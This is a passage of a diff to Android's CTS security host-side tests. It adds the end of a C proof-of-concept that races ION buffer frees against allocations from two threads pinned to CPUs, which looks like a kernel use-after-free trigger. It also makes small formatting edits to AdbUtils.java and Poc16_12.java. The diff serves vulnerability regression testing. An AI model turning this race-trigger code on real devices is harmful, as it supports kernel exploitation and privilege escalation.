+ }
+}
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ while (1) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ trigger_ion_free();
+ pthread_mutex_unlock(&mutex);
+ }
+
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+ setup_privi_and_affinity(0, 1);
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ pthread_cond_signal(&cond);
+ usleep(100);
+ trigger_ion_alloc();
+ sleep(1);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index 979ff5d..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -40,8 +40,7 @@
* @param device device for the command to be ran on
* @return the console output from running the command
*/
- public static String runCommandLine(String command, ITestDevice device) throws Exception
- {
+ public static String runCommandLine(String command, ITestDevice device) throws Exception {
return device.executeShellCommand(command);
}
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
index 0e03c5d..75f6e1e 100644
--- a/hostsidetests/security/src/android/security/cts/Poc16_12.java
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -31,7 +31,9 @@
import java.io.OutputStream;
import java.util.Scanner;
+
public class Poc16_12 extends SecurityTestCase {
+
/**
* b/32225180
*/
